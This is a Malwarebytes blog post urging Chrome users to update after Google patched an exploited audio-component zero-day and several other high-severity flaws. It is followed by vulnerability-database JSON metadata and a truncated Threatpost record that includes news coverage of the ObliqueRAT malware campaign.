The Microsoft Browser Vulnerability Research team has found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability ([CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)) in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the vulnerability. It is [not the first time](<https://www.tenable.com/blog/cve-2019-13720-use-after-free-zero-day-in-google-chrome-exploited-in-the-wild>) that Chrome's audio component was targeted by an exploit.
### No details available
Further details about the vulnerability are restricted until a majority of Chrome users have updated to the patched version of the software. What we do know is that it concerns an object lifecycle issue in the audio component of the browser.
An object lifecycle is used in object oriented programming to describe the time between an object's creation and its destruction. Outside of the lifecycle the object is no longer valid, which could lead to a vulnerability.
For example, if everything goes as planned with the lifecycle the correct amount of computer memory is allocated and reclaimed at the right times. If it doesn't go well, and memory is mismanaged, that could lead to a flaw – or vulnerability - in the program.
### More vulnerabilities patched in the update
As per usual Google patched several other vulnerabilities and bugs in the same update. Some of the other vulnerabilities were listed with high severity:
Google said that it fixed three heap-buffer overflow flaws in the TabStrip ([CVE-2021-21159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21159>), [CVE-2021-21161](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21161>)) and WebAudio ([CVE-2021-21160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21160>)) components. A high-severity use-after-free error ([CVE-2021-21162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21162>)) was found in WebRTC. Two other high-severity flaws include an insufficient data validation issue in Reader Mode ([CVE-2021-21163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21163>)) and an insufficient data validation issue in Chrome for iOS ([CVE-2021-21164](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21164>)).
### The CVE’s
Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).
* CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. Heap is the name for a region of a process’ memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.
* CVE-2021-21160: Heap buffer overflow in WebAudio.
* CVE-2021-21162: Use after free in WebRTC. Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program’s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. WebRTC allows programmers to add real-time communication capabilities to their application.
* CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation could allow an attacker to use especially crafted input to manipulate a program.
* CVE-2021-21164: Insufficient data validation in Chrome for iOS.
When more details about the vulnerabilities come to light it's possible that more exploits for them will be found in the wild. It depends a lot on how easy they are to abuse, and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now.
### How to update
The easiest way to do it is to allow Chrome to update automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.
So, it doesn’t hurt to check now and then. And now would be a good time.
My preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.
If there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is **Relaunch** the browser.
_After the update your version should be at 89.0.4.4389.72 or later_
Stay safe, everyone!
The post [Update now! Chrome fix patches in-the-wild zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).
{"id": "MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "type": "malwarebytes", "bulletinFamily": "blog", "title": "Update now! Chrome fix patches in-the-wild zero-day", "description": "The Microsoft Browser Vulnerability Research team has found and reported a vulnerability in the audio component of Google Chrome. Google has fixed this high-severity vulnerability ([CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>)) in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the vulnerability. It is [not the first time](<https://www.tenable.com/blog/cve-2019-13720-use-after-free-zero-day-in-google-chrome-exploited-in-the-wild>) that Chrome's audio component was targeted by an exploit.\n\n### No details available\n\nFurther details about the vulnerability are restricted until a majority of Chrome users have updated to the patched version of the software. What we do know is that it concerns an object lifecycle issue in the audio component of the browser.\n\nAn object lifecycle is used in object oriented programming to describe the time between an object's creation and its destruction. Outside of the lifecycle the object is no longer valid, which could lead to a vulnerability.\n\nFor example, if everything goes as planned with the lifecycle the correct amount of computer memory is allocated and reclaimed at the right times. If it doesn't go well, and memory is mismanaged, that could lead to a flaw \u2013 or vulnerability - in the program.\n\n### More vulnerabilities patched in the update\n\nAs per usual Google patched several other vulnerabilities and bugs in the same update. Some of the other vulnerabilities were listed with high severity:\n\nGoogle said that it fixed three heap-buffer overflow flaws in the TabStrip ([CVE-2021-21159](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21159>), [CVE-2021-21161](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21161>)) and WebAudio ([CVE-2021-21160](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21160>)) components. A high-severity use-after-free error ([CVE-2021-21162](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21162>)) was found in WebRTC. Two other high-severity flaws include an insufficient data validation issue in Reader Mode ([CVE-2021-21163](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21163>)) and an insufficient data validation issue in Chrome for iOS ([CVE-2021-21164](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-21164>)).\n\n### The CVE\u2019s\n\nPublicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services).\n\n * CVE-2021-21159, CVE-2021-21161: Heap buffer overflow in TabStrip. Heap is the name for a region of a process\u2019 memory which is used to store dynamic variables. A buffer overflow is a type of software vulnerability that exists when an area of memory within a software application reaches its address boundary and writes into an adjacent memory region. In software exploit code, two common areas that are targeted for overflows are the stack and the heap.\n * CVE-2021-21160: Heap buffer overflow in WebAudio.\n * CVE-2021-21162: Use after free in WebRTC. Use after free (UAF) is a vulnerability due to incorrect use of dynamic memory during a program\u2019s operation. If after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. WebRTC allows programmers to add real-time communication capabilities to their application.\n * CVE-2021-21163: Insufficient data validation in Reader Mode. Insufficient data validation could allow an attacker to use especially crafted input to manipulate a program.\n * CVE-2021-21164: Insufficient data validation in Chrome for iOS.\n\nWhen more details about the vulnerabilities come to light it's possible that more exploits for them will be found in the wild. It depends a lot on how easy they are to abuse, and how big the possible impact can be. But with one already being used in the wild, it is advisable to update now. \n\n### How to update\n\nThe easiest way to do it is to allow Chrome to update automatically, which basically uses the same method I outlined below but does not require your attention. But you can end up lagging behind if you never close the browser or if something goes wrong, such as an extension stopping you from updating the browser.\n\nSo, it doesn\u2019t hurt to check now and then. And now would be a good time.\n\nMy preferred method is to have Chrome open the page **chrome://settings/help** which you can also find by clicking **Settings > About Chrome**.\n\nIf there is an update available, Chrome will notify you and start downloading it. Then it will tell you all you have to do to complete the update is **Relaunch** the browser.\n\n_After the update your version should be at 89.0.4.4389.72 or later_\n\nStay safe, everyone!\n\nThe post [Update now! Chrome fix patches in-the-wild zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "published": "2021-03-04T13:24:38", "modified": "2021-03-04T13:24:38", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/update-now-chrome-fix-patches-in-the-wild-zero-day/", "reporter": "Pieter Arntz", "references": [], "cvelist": ["CVE-2019-13720", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21166"], "lastseen": "2021-03-04T14:27:39", "viewCount": 422, "enchantments": {"dependencies": {"references": [{"type": "archlinux", "idList": ["ASA-201911-1", "ASA-201911-2", "ASA-201911-7", "ASA-202103-19"]}, {"type": "attackerkb", "idList": ["AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1630", "CPAI-2021-0482"]}, {"type": "chrome", "idList": ["GCSA-3803715665928870837", "GCSA-4512841020680293434"]}, {"type": "cisa", "idList": ["CISA:809811C28F231C547A37018C8189C268"]}, {"type": "cve", "idList": ["CVE-2019-13720", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21166"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4562-1:58850", "DEBIAN:DSA-4886-1:0EF07", "DEBIAN:DSA-4886-1:8DF2D"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-13720", "DEBIANCVE:CVE-2021-21159", "DEBIANCVE:CVE-2021-21160", "DEBIANCVE:CVE-2021-21161", "DEBIANCVE:CVE-2021-21162", "DEBIANCVE:CVE-2021-21163", "DEBIANCVE:CVE-2021-21164", "DEBIANCVE:CVE-2021-21166"]}, {"type": "exploitdb", "idList": ["EDB-ID:50917"]}, {"type": "fedora", "idList": ["FEDORA:2B88A6092506", "FEDORA:3608E6051CC4", "FEDORA:A017F3074280", "FEDORA:AC09F608BFF0", "FEDORA:BF4FC30A0346", "FEDORA:C67773052A4D"]}, {"type": "freebsd", "idList": ["F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202004-04", "GLSA-202104-08"]}, {"type": "githubexploit", "idList": ["B8E18FAC-F86B-5BA2-9E5B-D9FA2576FED9", "CDF24E57-44DE-5297-B49D-D4E0AEE3F0AB"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:2E85097DC4FBE492B1CB6FAE84AFE126", "GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886", "GOOGLEPROJECTZERO:C2A64C2133DFD2ACB457C2DD2790CBF7", "GOOGLEPROJECTZERO:CA925EE6A931620550EF819815B14156"]}, {"type": "kaspersky", "idList": ["KLA11601", "KLA11716", "KLA12106", "KLA12107"]}, {"type": "krebs", "idList": ["KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB"]}, {"type": "mageia", "idList": ["MGASA-2019-0320", "MGASA-2021-0142"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21159", "MS:CVE-2021-21160", "MS:CVE-2021-21161", "MS:CVE-2021-21162", "MS:CVE-2021-21163", "MS:CVE-2021-21164", "MS:CVE-2021-21166"]}, {"type": "nessus", "idList": ["701236.PRM", "DEBIAN_DSA-4562.NASL", "DEBIAN_DSA-4886.NASL", "FEDORA_2019-2FA7552273.NASL", "FEDORA_2019-688D52F9FF.NASL", "FEDORA_2019-8508D74523.NASL", "FEDORA_2021-4740239E28.NASL", "FEDORA_2021-C88A96BD4B.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GENTOO_GLSA-202004-04.NASL", "GENTOO_GLSA-202104-08.NASL", "GOOGLE_CHROME_78_0_3904_87.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "MACOSX_GOOGLE_CHROME_78_0_3904_87.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "OPENSUSE-2019-2421.NASL", "OPENSUSE-2019-2664.NASL", "OPENSUSE-2021-392.NASL", "REDHAT-RHSA-2019-3775.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704562", "OPENVAS:1361412562310815823", "OPENVAS:1361412562310815824", "OPENVAS:1361412562310815825", "OPENVAS:1361412562310852760", "OPENVAS:1361412562310877007", "OPENVAS:1361412562310877015", "OPENVAS:1361412562310877259"]}, {"type": "osv", "idList": ["OSV:DSA-4562-1", "OSV:DSA-4886-1"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:167066"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:0082A77BD8EFFF48B406D107FEFD0DD3", "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}, {"type": "redhat", "idList": ["RHSA-2019:3775"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-13720"]}, {"type": "securelist", "idList": ["SECURELIST:20C7BC6E3C43CD3D939A2E3EAE01D4C1", "SECURELIST:4F6413DE862444B5FA0B192AF22A042D", "SECURELIST:5CA08A4E968A3A57A891B8DC568EBF97", "SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C", "SECURELIST:FED90A1B8959D4636DBADB1E135F7BF7"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2421-1", "OPENSUSE-SU-2019:2426-1", "OPENSUSE-SU-2019:2427-1", "OPENSUSE-SU-2019:2447-1", "OPENSUSE-SU-2019:2664-1", "OPENSUSE-SU-2021:0392-1", "OPENSUSE-SU-2021:0401-1"]}, {"type": "talos", "idList": ["TALOS-2021-1235"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1789DE47001AAA9B14B2D2EC65C18C6A"]}, {"type": "thn", "idList": ["THN:15BF409706D7240A5276C705732D745F", "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:50D7C51FE6D69FC5DB5B37402AD0E412", "THN:6A9CD6F085628D08978727C0FF597535", "THN:7D7C05739ECD847B8CDEEAF930C51BF8", "THN:9C73175440CD28F1BCB5707C48282690", "THN:B7217784F9D53002315C9C43CCC73766", "THN:BBBFDA7EEE18F813A5DA572FD390D528", "THN:C736174C6B0ADC38AA88BC58F30271DA", "THN:CDCF433A7837180E1F294791C672C5BB", "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "THN:F197A729A4F49F957F9D5910875EBAAA"]}, {"type": "threatpost", "idList": ["THREATPOST:230DF95E70EB9C4F372C198798822D19", "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "THREATPOST:6F7E512F15913694CF17A906715FE678", "THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:CF9E25BD324C5940B0795721CA134155", "THREATPOST:DF87733B74489628AB9F2C89704380A9", "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-13720", "UB:CVE-2021-21159", "UB:CVE-2021-21160", "UB:CVE-2021-21161", "UB:CVE-2021-21162", "UB:CVE-2021-21163", "UB:CVE-2021-21164", "UB:CVE-2021-21166"]}, {"type": "veracode", "idList": ["VERACODE:29632", "VERACODE:29634", "VERACODE:29635", "VERACODE:29636", "VERACODE:29637", "VERACODE:29638", "VERACODE:30285"]}, {"type": "zdt", "idList": ["1337DAY-ID-37719"]}]}, "score": {"value": -0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "archlinux", "idList": ["ASA-201911-1", "ASA-201911-2", "ASA-201911-7", "ASA-202103-19"]}, {"type": "attackerkb", "idList": ["AKB:3609E46B-E023-474D-B14A-026E01AF8EA9", "AKB:C300BC5A-FE8F-4274-AFA8-C1F47411FEC1", "AKB:C5336A4C-EEE0-4EA3-AD28-85F0EF3F0F75", "AKB:DFA61FBF-688B-44E9-8B09-134E93207AD9"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2019-1630", "CPAI-2021-0482"]}, {"type": "chrome", "idList": ["GCSA-3803715665928870837", "GCSA-4512841020680293434"]}, {"type": "cisa", "idList": ["CISA:809811C28F231C547A37018C8189C268"]}, {"type": "cve", "idList": ["CVE-2019-13720", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21166"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4562-1:58850", "DEBIAN:DSA-4886-1:0EF07"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2019-13720", "DEBIANCVE:CVE-2021-21159", "DEBIANCVE:CVE-2021-21160", "DEBIANCVE:CVE-2021-21161", "DEBIANCVE:CVE-2021-21162", "DEBIANCVE:CVE-2021-21163", "DEBIANCVE:CVE-2021-21164", "DEBIANCVE:CVE-2021-21166"]}, {"type": "fedora", "idList": ["FEDORA:2B88A6092506", "FEDORA:3608E6051CC4", "FEDORA:A017F3074280", "FEDORA:AC09F608BFF0", "FEDORA:BF4FC30A0346", "FEDORA:C67773052A4D"]}, {"type": "freebsd", "idList": ["F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "gentoo", "idList": ["GLSA-202004-04"]}, {"type": "githubexploit", "idList": ["B8E18FAC-F86B-5BA2-9E5B-D9FA2576FED9", "CDF24E57-44DE-5297-B49D-D4E0AEE3F0AB"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:4C8E7D595A367E9DA6260DA13FAF3886"]}, {"type": "kaspersky", "idList": ["KLA11601", "KLA11716"]}, {"type": "krebs", "idList": ["KREBS:F5ECCD2DD57FDBC0A6062FA0AB5371FB"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:390E663F11CA04293C83488A40CB3A8A"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/FREEBSD-CVE-2021-21159/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2021-21160/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2021-21161/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2021-21162/", "MSF:ILITIES/GOOGLE-CHROME-CVE-2021-21166/", "MSF:ILITIES/MSFT-CVE-2021-26866/"]}, {"type": "mscve", "idList": ["MS:CVE-2021-21159", "MS:CVE-2021-21160", "MS:CVE-2021-21161", "MS:CVE-2021-21162", "MS:CVE-2021-21163", "MS:CVE-2021-21164", "MS:CVE-2021-21166"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-4562.NASL", "DEBIAN_DSA-4886.NASL", "FEDORA_2019-2FA7552273.NASL", "FEDORA_2019-688D52F9FF.NASL", "FEDORA_2019-8508D74523.NASL", "FEDORA_2021-C88A96BD4B.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "GOOGLE_CHROME_78_0_3904_87.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "MACOSX_GOOGLE_CHROME_78_0_3904_87.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "OPENSUSE-2019-2421.NASL", "OPENSUSE-2021-392.NASL", "REDHAT-RHSA-2019-3775.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310704562", "OPENVAS:1361412562310815823", "OPENVAS:1361412562310815824", "OPENVAS:1361412562310815825", "OPENVAS:1361412562310852760", "OPENVAS:1361412562310877007", "OPENVAS:1361412562310877015"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}, {"type": "redhatcve", "idList": ["RH:CVE-2019-13720"]}, {"type": "securelist", "idList": ["SECURELIST:5CA08A4E968A3A57A891B8DC568EBF97", "SECURELIST:B3F6FE1E8EA0830B8B1306E79A2E63EA"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2019:2421-1", "OPENSUSE-SU-2019:2426-1", "OPENSUSE-SU-2019:2427-1", "OPENSUSE-SU-2019:2447-1"]}, {"type": "talos", "idList": ["TALOS-2021-1235"]}, {"type": "talosblog", "idList": ["TALOSBLOG:1789DE47001AAA9B14B2D2EC65C18C6A"]}, {"type": "thn", "idList": ["THN:15BF409706D7240A5276C705732D745F", "THN:1A836FDDE57334BC4DAFA65E6DFA02E4", "THN:4CC79A3CEFEDEB0DC9CF87C5B9035209", "THN:9C73175440CD28F1BCB5707C48282690", "THN:EF50BA60FF5E3EF9AF1570FF5A2589A0", "THN:F197A729A4F49F957F9D5910875EBAAA"]}, {"type": "threatpost", "idList": ["THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:CF9E25BD324C5940B0795721CA134155"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2019-13720", "UB:CVE-2021-21159", "UB:CVE-2021-21160", "UB:CVE-2021-21161", "UB:CVE-2021-21162", "UB:CVE-2021-21163", "UB:CVE-2021-21164", "UB:CVE-2021-21166"]}]}, "exploitation": null, "vulnersScore": -0.2}, "immutableFields": [], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": true}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 5.9}, "edition": 2, "scheme": null, "_state": {"dependencies": 1659994789, "score": 1659955861}, "_internal": {"score_hash": "0325d8d8e6102eaeab1565c4abb72fe8"}}
{"threatpost": [{"lastseen": "2021-03-04T21:58:01", "description": "Google has fixed a high-severity vulnerability in its Chrome browser and is warning Chrome users that an exploit exists in the wild for the flaw.\n\nThe vulnerability is one of 47 security fixes that the tech giant rolled out on Tuesday in Chrome 89.0.4389.72, including patches for eight high-severity flaws.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThe Chrome team is delighted to announce the promotion of Chrome 89 to the stable channel for Windows, Mac and Linux,\u201d according to Google [on Tuesday](<https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>). \u201cThis will roll out over the coming days/weeks.\u201d\n\n## Google Chrome: Actively-Exploited Security Flaw\n\nThe actively-exploited vulnerability in question (CVE-2021-21166) stems from the audio component of the browser (which [has previously been found](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) to have various security issues in the past). According to Google, the flaw stems from an object lifecycle issue. The object lifecycle is the duration in which a programming language object is valid for use \u2013 between the time it is created and destroyed.\n\nBeyond Google noting that it \u201cis aware of reports that an exploit for CVE-2021-21166 exists in the wild,\u201d further information about the glitch is unavailable. That\u2019s because \u201caccess to bug details and links may be kept restricted until a majority of users are updated with a fix,\u201d according to Google.\n\nThe flaw was reported by Alison Huffman, with the Microsoft Browser Vulnerability Research team, on Feb. 11. Huffman reported another high-severity flaw that Google fixed in Chrome, which also stemmed from an object lifecycle issue in the audio component (CVE-2021-21165).\n\n## Other Chrome Security High-Severity Flaws\n\nDetails around the other high-severity vulnerabilities patched by Google in Chrome remain scant. However, Google said that it fixed three heap-buffer overflow flaws in the TabStrip (CVE-2021-21159, CVE-2021-21161) and WebAudio (CVE-2021-21160) components. A high-severity use-after-free error (CVE-2021-21162) was found in WebRTC.\n\nTwo other high-severity flaws include an insufficient data validation issue in Reader Mode (CVE-2021-21163) and an insufficient data validation issue in Chrome for iOS (CVE-2021-21164).\n\n## **Google Chrome Security Updates**\n\nChrome will in many cases update to its newest version automatically, however security experts suggest that users double check that this has happened. To check if an update is available:\n\n * Google Chrome users can go to chrome://settings/help by clicking Settings > About Chrome\n * If an update is available Chrome will notify users and then start the download process\n * Users can then relaunch the browser to complete the update\n\nThe fixes come after Google in February [warned of a zero-day vulnerability](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) in its V8 open-source web engine that\u2019s being actively exploited by attackers. In January, the Cybersecurity and Infrastructure Security Agency (CISA) [urged Windows, macOS and Linux users](<https://threatpost.com/firefox-chrome-edge-bugs-system-hijacking/162873/>) of Google\u2019s Chrome browser to patch an out-of-bounds write bug (CVE-2020-15995) impacting the current 87.0.4280.141 version of the software.\n\nAnd in December, Google updated Chrome to fix four bugs with a severity rating of \u201chigh\u201d and eight overall. [Three were use-after-free flaws](<https://threatpost.com/google_chrome_bugs_patched/161907/>), which could allow an adversary to generate an error in the browser\u2019s memory, opening the door to a browser hack and host computer compromise.\n", "cvss3": {}, "published": "2021-03-03T21:17:14", "type": "threatpost", "title": "Google Patches Actively Exploited Flaw in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-15995", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166"], "modified": "2021-03-03T21:17:14", "id": "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "href": "https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-03T22:09:38", "description": "The ObliqueRAT malware is now cloaking its payloads as seemingly-innocent image files that are hidden on compromised websites.\n\nThe remote access trojan (RAT), which has been operating since 2019, spreads via emails, which have malicious Microsoft Office documents attached. Previously, payloads were embedded into the documents themselves. Now, if users click on the attachment, they\u2019re redirected to malicious URLs where the payloads are hidden with steganography.\n\nResearchers warn that this new tactic has been seen helping ObliqueRAT operators to avoid detection during the malware\u2019s targeting of various organizations in South Asia \u2014 where the goal is to ultimately sends victims an email with malicious Microsoft Office documents, which, once clicked, fetch the payloads and ultimately exfiltrate various data from the victim.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new campaign is a typical example of how adversaries react to attack disclosures and evolve their infection chains to evade detections,\u201d said Asheer Malhotra, researcher with Cisco Talos, [on Tuesday](<https://blog.talosintelligence.com/2021/02/obliquerat-new-campaign.html>). \u201cModifications in the ObliqueRAT payloads also highlight the usage of obfuscation techniques that can be used to evade traditional signature-based detection mechanisms.\u201d\n\n## **What is the ObliqueRAT Malware?**\n\n[The known activity for ObliqueRAT](<https://blog.talosintelligence.com/2020/02/obliquerat-hits-victims-via-maldocs.html>) dates back to November 2019, part of a campaign targeting entities in Southeast Asia and uncovered by Cisco Talos researchers in February 2020. ObliqueRAT operators have always used emails with malicious attachments as an initial infection vector. Generally the infection chain uses an initial executable, which acts as a dropper for ObliqueRAT itself.\n\nOnce it infected systems, ObliqueRAT exfiltrates various information, including system data, a list of drives and a list of running processes.\n\n## **ObliqueRAT Malware Evolution**\n\nThe newly discovered ObliqueRAT attack chain was part of a campaign that started in May last year \u2013 but which was only recently uncovered by researchers. In addition to the use of URL redirects, the payloads themselves have also been given an update, now consisting of seemingly benign bitmap image files (BMP).\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/03/02102115/ObliqueRAT-Payloads.png>)\n\nThe new attack chain used by ObliqueRAT. Credit: Cisco Talos\n\nThe image files contain both legitimate image data and malicious executable bytes concealed in the image data, said researchers. Threatpost has reached out to Cisco Talos for further information on the compromised websites and the images used as part of the attack.\n\nThis is a well-known tactic used by [threat actors, called steganography](<https://threatpost.com/steganography-pinpoint-attacks-industrial-targets/156151/>). Attackers hide malware in image files as a way to circumvent detection. That\u2019s because many filters and gateways [let image file formats pass without too much scrutiny](<https://threatpost.com/rare-steganography-hack-can-compromise-fully-patched-websites/146701/>).\n\nThe initial email sent to victims contains malicious documents with new macros, which redirect users to the malicious URLs containing these payloads. The malicious macros consequently download the BMP files, and the ObliqueRAT payload is extracted to the disk.\n\nThere are slight variations that have been seen in real-world attacks. One instance of a malicious document that researchers found \u201cuses a similar technique, with the difference being that the payload hosted on the compromised website is a BMP image containing a .ZIP file that contains ObliqueRAT payload,\u201d said Malhotra. \u201cThe malicious macros are responsible for extracting the .ZIP and subsequently the ObliqueRAT payload on the endpoint.\u201d\n\nDuring the course of their investigation, researchers also discovered three previously used but never-before-seen payloads for ObliqueRAT, which showed how the malware authors have made changes over time. For instance, one of the versions created in September added new file enumeration and stealing capabilities, as well as expanded the payload\u2019s functionalities to include the ability to take webcam and desktop screenshots and recordings.\n\n## **ObliqueRAT: Hiding From Detection, Improved Persistence**\n\nThis updated payload delivery technique gives attackers a leg up in sidestepping detection, said 